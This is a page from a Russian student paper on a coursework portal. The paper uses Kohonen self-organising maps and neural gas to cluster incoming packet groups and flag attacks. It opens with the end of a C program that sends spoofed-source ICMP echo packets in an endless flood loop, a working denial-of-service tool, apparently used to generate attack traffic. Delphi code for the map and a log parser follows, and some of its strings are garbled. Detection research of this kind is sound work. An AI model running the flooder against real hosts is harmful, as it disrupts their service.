на тему рефераты Информационно-образоательный портал
Рефераты, курсовые, дипломы, научные работы,
на тему рефераты
на тему рефераты
МЕНЮ|
на тему рефераты
поиск
Кластеризация групп входящих пакетов с помощью нейронных сетей конкурирующего типа
p align="left">icmp->checksum = in_cksum(icmp,pingsize+ICMPHDRSIZE+IPHDRSIZE+8);

return sendto(socket,packet,pingsize+IPHDRSIZE+ICMPHDRSIZE+IPHDRSIZE+8,0,

(struct sockaddr *)&destaddr,sizeof(struct sockaddr));

}

void main(int argc, char *argv[])

{

int s, i;

int floodloop;

if (parse_args(argc,argv))

{

usage(argv[0]);

return;

}

resolve_all(dest_name, spoof_name);

give_info();

s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);

if (!flood)

{

if (icmp_echo_send(s,spoof_addr,dest_addr,pingsize) == -1)

{

printf("%s error sending packet\n",argv[0]); perror(""); return;

}

}

else

{

floodloop = 0;

if ( pingnmbr && (pingnmbr > 0) )

{

printf("sending... packet limit set\n");

for (i=0;i<pingnmbr;i++)

{

if (icmp_echo_send(s,spoof_addr,dest_addr,pingsize) == -1)

{

printf("%s error sending packet\n",argv[0]); perror(""); return;

}

usleep((pingsleep*1000));

if (!(floodloop = (floodloop+1)%25))

{ fprintf(stdout,"."); fflush(stdout);

}

}

printf("\ncomplete, %u packets sent\n", pingnmbr);

}

else {

printf("flooding, (. == 25 packets)\n");

for (i=0;i<1;i)

{

if (icmp_echo_send(s,spoof_addr,dest_addr,pingsize) == -1)

{

printf("%s error sending packet\n",argv[0]); perror(""); return;

}

usleep(900);

if (!(floodloop = (floodloop+1)%25))

{ fprintf(stdout,"."); fflush(stdout);

}

}

}

}

}

Листинг 3. Самоорганизующаяся карта признаков.

TNeuron = class

public

IntVal : TIntArray;

ExtVal : TExtArray;

Pos : Extended;

Status : Extended;

Y : Extended;

MassWeight : Array of Extended;

constructor Init(a : PIntArray; b : PExtArray);

function FunctionActivation : Extended;

procedure GetAksonValue(a : PExtArray);

procedure Randomization;

procedure Distantion(a : PExtArray);

end;

TLayer = class

public

ExtArr : TExtArray;

Neurons : Array of TNeuron;

QNeurons : integer;

QInputs : integer;

InputValues : Array of Extended;

OutputValues : Array of Extended;

constructor Init(a : PIntArray; b : PExtArray);

procedure GetInputValues(Values : PExtArray);

procedure GetOutputValues;

procedure Excitement;

procedure randomization;

end;

TKohonenLayer = class(TLayer)

public

eta,sigma : Extended;

h,w : Word;

constructor Init(a : PIntArray; b : PExtArray);

procedure Normalize;

function TheWinnerTakesItAll : integer;

function Classic : integer;

procedure Learning(a : integer; SpeedLearn : Extended);

procedure LearningNeib(a : integer; SpeedLearn : Extended);

procedure SigmaInit(s : Extended);

procedure ConvexCombination(delta : Extended);

procedure NeuralGaz(SpeedLearn : Extended);

end;

procedure TKohonenLayer.SigmaInit(s : Extended);

begin

Sigma:=s;

end;

procedure TKohonenLayer.ConvexCombination(delta : Extended);

var i : integer;

begin

eta:=eta+delta;

sigma:=sigma+0.1-10*delta;

for i:=0 to QInputs-1 do InputValues[i]:=InputValues[i]*eta+(1-eta)/sqrt(QInputs);

end;

constructor TKohonenLayer.Init(a : PIntArray; b : PExtArray);

var i : integer;

New : TIntArray;

begin

Inherited Init(a,b);

New:=a^;

H:=New.Value[3];

W:=Round(New.Value[2]/New.Value[3]);

Randomization;

for i:=0 to New.Value[2]-1 do Neurons[i].Pos:=3.75;

eta:=0;

end;

procedure TKohonenLayer.Normalize;

var i : integer;

Sum : Extended;

begin

Sum:=0;

for i:=0 to QInputs-1 do Sum:=Sum+Sqr(InputValues[i]);

for i:=0 to QInputs-1 do

InputValues[i]:=InputValues[i]/Sqrt(Sum);

end;

function TKohonenLayer.TheWinnerTakesItAll : integer;

var i,p : integer;

Min : Extended;

begin

Min:=Neurons[0].Y;

p:=0;

for i:=1 to QNeurons-1 do

begin

if Neurons[i].Pos>0.75 then

if Min>Neurons[i].Y then

begin

p:=i;

Min:=Neurons[i].Y;

end;

end;

for i:=0 to QNeurons-1 do Neurons[i].Y:=0;

for i:=0 to QNeurons-1 do

if i=p then Neurons[i].Pos:=Neurons[i].Pos-0.75

else Neurons[i].Pos:=Neurons[i].Pos+1/QNeurons;

Neurons[p].Y:=1;

GetOutputValues;

TheWinnerTakesItAll:=p;

end;

function TKohonenLayer.Classic : integer;

var i,p : integer;

Min : Extended;

begin

Min:=Neurons[0].Y;

p:=0;

for i:=1 to QNeurons-1 do

begin

if Min>Neurons[i].Y then

begin

p:=i;

Min:=Neurons[i].Y;

end;

end;

for i:=0 to QNeurons-1 do Neurons[i].Y:=0;

Neurons[p].Y:=1;

GetOutputValues;

Classic:=p;

end;

procedure TKohonenLayer.Learning(a : integer; SpeedLearn : Extended);

var i : integer;

begin

for i:=1 to QInputs do

Neurons[a].MassWeight[i]:=Neurons[a].MassWeight[i]+

SpeedLearn*(InputValues[i-1]-Neurons[a].MassWeight[i]);

end;

procedure TKohonenLayer.LearningNeib(a : integer; SpeedLearn : Extended);

var i,j : integer;

begin

for j:=0 to QNeurons-1 do

begin

for i:=1 to QInputs do

Neurons[j].MassWeight[i]:=Neurons[j].MassWeight[i]+

exp(-(Sqr((j div w)-(a div w)) + Sqr((j mod h)-(a mod h)))/(2*Sqr(sigma)))

*SpeedLearn*(InputValues[i-1]-Neurons[j].MassWeight[i]);

end;

end;

procedure TKohonenLayer.NeuralGaz(SpeedLearn : Extended);

var i,j,k,p : integer;

Mass : Array of Extended;

Min : Extended;

begin

SetLength(Mass,QNeurons);

for i:=0 to QNeurons-1 do Mass[i]:=-1;

p:=0;

for i:=0 to QNeurons-1 do

begin

p:=p+1;

Min:=999999;

k:=-1;

for j:=0 to QNeurons-1 do

begin

if Neurons[j].Y<Min then

if Mass[j]=-1 then

begin

k:=j;

Min:=Neurons[j].Y;

end;

end;

Mass[k]:=p;

end;

for j:=0 to QNeurons-1 do

begin

for i:=1 to QInputs do

Neurons[j].MassWeight[i]:=Neurons[j].MassWeight[i]+

exp(-Mass[j]/Sigma)*SpeedLearn*(InputValues[i-1]-Neurons[j].MassWeight[i]);

end;

end;

constructor TNeuron.Init(a : PIntArray; b : PExtArray);

var

New : TIntArray;

begin

New:=a^;

ExtVal:=b^;

IntVal:=TIntArray.Init(2);

IntVal.Value[0]:=New.Value[0]+1;

IntVal.Value[1]:=New.Value[1];

SetLength(MassWeight,IntVal.Value[0]);

if IntVal.Value[0]>0 then MassWeight[0]:=0;

Status:=0;

Y:=0;

Pos:=0;

end;

procedure TNeuron.GetAksonValue(a : PExtArray);

var

i : integer;

b : TExtArray;

begin

b:=a^;

Status:=MassWeight[0];

for i:=1 to IntVal.Value[0]-1 do Status:=Status+MassWeight[i]*b.Value[i-1];

Y:=FunctionActivation;

end;

procedure TNeuron.Distantion(a : PExtArray);

var i : integer;

b : TExtArray;

begin

b:=a^;

Status:=0;

for i:=1 to IntVal.Value[0]-1 do Y:=Y+Sqr(MassWeight[i]-b.Value[i-1]);

Y:=Sqrt(Y);

end;

function TNeuron.FunctionActivation : Extended;

Var m : Extended;

begin

case IntVal.Value[1] of

1 : m:=1/(1+exp(-ExtVal.Value[0]*Status));

2 : m:=ExtVal.Value[0]*Status;

end;

FunctionActivation:=m;

end;

procedure TNeuron.Randomization;

var i : integer;

begin

for i:=0 to IntVal.Value[0]-1 do MassWeight[i]:=random(255);

end;

constructor TLayer.Init(a : PIntArray; b : PExtArray);

var i : integer;

//c : TIntArray;

IntArr : TIntArray;

begin

IntArr:=a^;

QInputs:=IntArr.Value[0];

QNeurons:=IntArr.Value[2];

IntArr.NewLength(2);

ExtArr:=b^;

SetLength(Neurons,SizeOf(TNeuron)*QNeurons);

for i:=0 to QNeurons-1 do Neurons[i]:=TNeuron.Init(@IntArr,b);

SetLength(InputValues,QInputs);

for i:=0 to QInputs-1 do InputValues[i]:=0;

SetLength(OutputValues,QNeurons);

end;

procedure TLayer.GetInputValues(Values : PExtArray);

var i : integer;

a : TExtArray;

begin

a:=Values^;

for i:=0 to QInputs-1 do InputValues[i]:=a.Value[i];

end;

procedure TLayer.Excitement;

var i : integer;

a : TExtArray;

begin

a:=TExtArray.Init(QInputs);

for i:=0 to QInputs-1 do a.Value[i]:=InputValues[i];

for i:=0 to QNeurons-1 do Neurons[i].Distantion(@a);//GetAksonValue(@a);

GetOutputValues;

end;

procedure TLayer.GetOutputValues;

var i : integer;

begin

for i:=0 to QNeurons-1 do OutputValues[i]:=Neurons[i].Y;

end;

procedure TLayer.randomization;

var i : integer;

begin

for i:=0 to QNeurons-1 do Neurons[i].Randomization;

end;

procedure TForm1.Button2Click(Sender: TObject);

var

F : TextFile;

i,j,p,s1,s2,k : integer;

Str : String;

Ch : Char;

Sum : integer;

Temp : Array of String;

begin

OpenDialog1.Filter:='?o?iaeuiue oaee|*.log|';

if (OpenDialog1.Execute) and fileExists(OpenDialog1.FileName) then

begin

AssignFile(F,OpenDialog1.FileName);

Reset(F);

ReadLn(F);

Read(F,Q);

SetLength(Prot,Q);

SetLength(Host,Q);

SetLength(LocalH,Q);

SetLength(Frag,Q);

SetLength(Size,Q);

SetLength(Proc,Q);

SetLength(Active,Q);

SetLength(HACK,Q);

MyList.Clear;

MyList.Add('Iiia?');

MyList.Add('I?ioieie');

MyList.Add('Oino');

MyList.Add('Naiy EAN');

MyList.Add('O?aaiaioaoey');

MyList.Add('?acia?');

MyList.Add('I?ioanni? %%');

MyList.Add('Ioaa?aao');

StringGrid1.RowCount:=Q+1;

StringGrid1.Rows[0]:=MyList;

for i:=0 to Q-1 do

begin

MyList.Clear;

Read(F,j);

MyList.Add(IntToStr(j));

//Memo4.Lines.Add(IntToStr(j));

Read(F,Ch);

Read(F,Ch);

Read(F,Ch);

Prot[i]:='';

While(ch<>' ') do

begin

Prot[i]:=Prot[i]+Ch;

Read(F,Ch);

end;

MyList.Add(Prot[i]);

Read(F,Ch);

Read(F,Ch);

Read(F,Ch);

Host[i]:='';

While(ch<>' ') do

begin

Host[i]:=Host[i]+Ch;

Read(F,Ch);

end;

MyList.Add(Host[i]);

Read(F,Ch);

Read(F,Ch);

Str:='';

While(ch<>' ') do

begin

Str:=Str+Ch;

Read(F,Ch);

end;

MyList.Add(Str);

if Str='YES' then LocalH[i]:=1 else LocalH[i]:=0;

Read(F,Ch);

Read(F,Ch);

Str:='';

While(ch<>' ') do

begin

Str:=Str+Ch;

Read(F,Ch);

end;

MyList.Add(Str);

if Str='YES' then Frag[i]:=1 else Frag[i]:=0;

Read(F,Size[i]);

MyList.Add(IntToStr(Size[i]));

Read(F,Proc[i]);

MyList.Add(IntToStr(Proc[i]));

Read(F,Ch);

Read(F,Ch);

Read(F,Ch);

Str:='';

While(ch<>' ') do

begin

Str:=Str+Ch;

Read(F,Ch);

end;

MyList.Add(Str);

if Str='YES' then Active[i]:=1 else Active[i]:=0;

StringGrid1.Rows[j]:=MyList;

Read(F,Ch);

if Ch='H' then HACK[i]:=1 else HACK[i]:=0;

//Memo4.Lines.Add('**************');

end;

//Memo4.Lines.Add(IntToStr(Q));

CloseFile(F);

SetLength(Temp,10);

SetLength(Mass,(Q-1)*11);

SetLength(SHack,Q-1);

for i:=0 to Q-12 do

begin

Mass[12*i]:=0;

for j:=0 to 9 do Mass[12*i]:=Mass[12*i]+LocalH[i+j];

Mass[12*i+1]:=0;

for j:=0 to 9 do Mass[12*i+1]:=Mass[12*i+1]+Frag[i+j];

Mass[12*i+2]:=0;

Mass[12*i+3]:=0;

for j:=0 to 9 do

if Prot[i+j]='TCP' then Mass[12*i+2]:=Mass[12*i+2]+1;

for j:=0 to 9 do

if Prot[i+j]='UDP' then Mass[12*i+3]:=Mass[12*i+3]+1;

Sum:=1;

s1:=0;

for j:=0 to 9 do

begin

Str:=Host[i+j];

p:=0;

for k:=0 to 9 do

begin

if Str=Host[i+k] then

begin

p:=p+1;

s2:=k;

end;

end;

if p>Sum then

begin

Sum:=p;

s1:=s2;

end;

end;

Mass[12*i+4]:=Sum;

Mass[12*i+5]:=LocalH[i+s1];

Sum:=0;

for j:=0 to 9 do Sum:=Sum+Proc[i+j];

Mass[12*i+6]:=Sum/10;

Mass[12*i+7]:=Proc[i+9]-Proc[i];

Sum:=0;

for j:=0 to 9 do Sum:=Sum+Size[i+j];

Mass[12*i+8]:=Sum/10;

Sum:=0;

for j:=0 to 9 do

if (Size[i+j]>=0.8*Mass[12*i+8])and

(Size[i+j]<=1.2*Mass[12*i+8]) then Sum:=Sum+1;

Mass[12*i+9]:=Sum;

Sum:=0;

for j:=0 to 9 do Sum:=Sum+Active[i+j];

Mass[12*i+10]:=Sum;

for j:=0 to 9 do Temp[j]:=Host[i+j];

for j:=0 to 8 do

begin

Str:=Temp[j];

for k:=0 to 9 do

if k<>j then

if Str=Temp[k] then Temp[k]:='';

end;

Sum:=0;

for j:=0 to 9 do

if Temp[j]<>'' then Sum:=Sum+1;

Mass[12*i+11]:=Sum;

Sum:=0;

for j:=0 to 9 do Sum:=Sum+HACK[i+j];

SHAck[i]:=Sum;

end;

end;

end;

procedure TForm1.InitializationMap;

var i,j,p : integer;

begin

for i:=0 to H*W-1 do

begin

p:=Random(Q-13);

for j:=0 to 10 do

KMap.Neurons[i].MassWeight[j+1]:=Mass[12*p+j];

end;

end;

procedure TForm1.Button3Click(Sender: TObject);

var i,j,p,k,m : integer;

Quant,Winner : integer;

Part : TExtArray;

SMax,SMin : Extended;

begin

InitializationMap;

for i:=0 to Image1.Height-1 do

for j:=0 to Image1.Width-1 do

Image1.Picture.Bitmap.Canvas.Pixels[i,j]:=RGB(150,150,150);

Quant:=StrToInt(Edit3.Text);

Part:=TExtArray.Init(12);

SMax:=0.7;

SMin:=0.0001;

ProgressBar1.Max:=Quant;

ProgressBar1.Position:=0;

for i:=0 to Quant-1 do

begin

KMap.SigmaInit(10*(1-i/Quant)+0.1);

p:=Random(Q-12);

for j:=0 to 11 do Part.Value[j]:=Mass[12*p+j];

KMap.GetInputValues(@Part);

KMap.Excitement;

Case RadioGroup1.ItemIndex of

0:

begin

Winner:=KMap.Classic;

if CheckBox1.Checked then KMap.LearningNeib(Winner,SMax-(SMax-SMin)*i/Quant)

else KMap.Learning(Winner,SMax-(SMax-SMin)*i/Quant);

end;

1:

begin

Winner:=KMAp.TheWinnerTakesItAll;

if CheckBox1.Checked then KMap.LearningNeib(Winner,SMax-(SMax-SMin)*i/Quant)

else KMap.Learning(Winner,SMax-(SMax-SMin)*i/Quant)

end;

2:

begin

KMap.NeuralGaz(SMax-(SMax-SMin)*i/Quant);

end;

end;

ProgressBar1.StepBy(1);

end;

ProgressBar1.Position:=0;

for i:=0 to KMap.QNeurons-1 do

KMap.Neurons[i].MassWeight[0]:=0;

for i:=0 to Q-12 do

begin

for j:=0 to 11 do Part.Value[j]:=Mass[12*i+j];

KMap.GetInputValues(@Part);

KMap.Excitement;

Winner:=KMap.Classic;

KMap.Neurons[Winner].MassWeight[0]:=1;

//Memo4.Lines.Add(IntToStr(Winner));

if SHack[i]>=8 then

begin

for m:=0 to W1-1 do

for k:=0 to H1-1 do

Image1.Picture.Bitmap.Canvas.Pixels[(Winner div W)*W1+m,(Winner mod W)*H1+k]:=RGB(255,0,0);

end

else if SHack[i]=7 then

begin

for m:=0 to W1-1 do

for k:=0 to H1-1 do

Image1.Picture.Bitmap.Canvas.Pixels[(Winner div W)*W1+m,(Winner mod W)*H1+k]:=RGB(255,40,40);

end

else if SHack[i]=6 then

begin

for m:=0 to W1-1 do

for k:=0 to H1-1 do

Image1.Picture.Bitmap.Canvas.Pixels[(Winner div W)*W1+m,(Winner mod W)*H1+k]:=RGB(225,80,80);

end

else if SHack[i]=5 then

begin

for m:=0 to W1-1 do

for k:=0 to H1-1 do

Image1.Picture.Bitmap.Canvas.Pixels[(Winner div W)*W1+m,(Winner mod W)*H1+k]:=RGB(225,120,120);

end

else if SHack[i]=4 then

begin

for m:=0 to W1-1 do

for k:=0 to H1-1 do

Image1.Picture.Bitmap.Canvas.Pixels[(Winner div W)*W1+m,(Winner mod W)*H1+k]:=RGB(225,160,160);

end

else if SHack[i]=3 then

begin

for m:=0 to W1-1 do

for k:=0 to H1-1 do

Image1.Picture.Bitmap.Canvas.Pixels[(Winner div W)*W1+m,(Winner mod W)*H1+k]:=RGB(225,200,200);

end

else

begin

for m:=0 to W1-1 do

for k:=0 to H1-1 do

Image1.Picture.Bitmap.Canvas.Pixels[(Winner div W)*W1+m,(Winner mod W)*H1+k]:=RGB(225,225,225);

end;

//Image2.Picture.Bitmap.Canvas.

//.Pixels[j,i]:=RGB(

end;

for i:=0 to KMap.QNeurons-1 do

begin

if KMap.Neurons[i].MassWeight[0]=1 then

begin

Memo3.Lines.Add('Iae?ii '+IntToStr(i));

for j:=0 to KMap.QInputs-1 do

Memo3.Lines.Add(FloatToStr(KMap.Neurons[i].MassWeight[j]));

end;

end;

end;

Страницы: 1, 2, 3, 4, 5



© 2003-2013
Рефераты бесплатно, курсовые, рефераты биология, большая бибилиотека рефератов, дипломы, научные работы, рефераты право, рефераты, рефераты скачать, рефераты литература, курсовые работы, реферат, доклады, рефераты медицина, рефераты на тему, сочинения, реферат бесплатно, рефераты авиация, рефераты психология, рефераты математика, рефераты кулинария, рефераты логистика, рефераты анатомия, рефераты маркетинг, рефераты релиния, рефераты социология, рефераты менеджемент.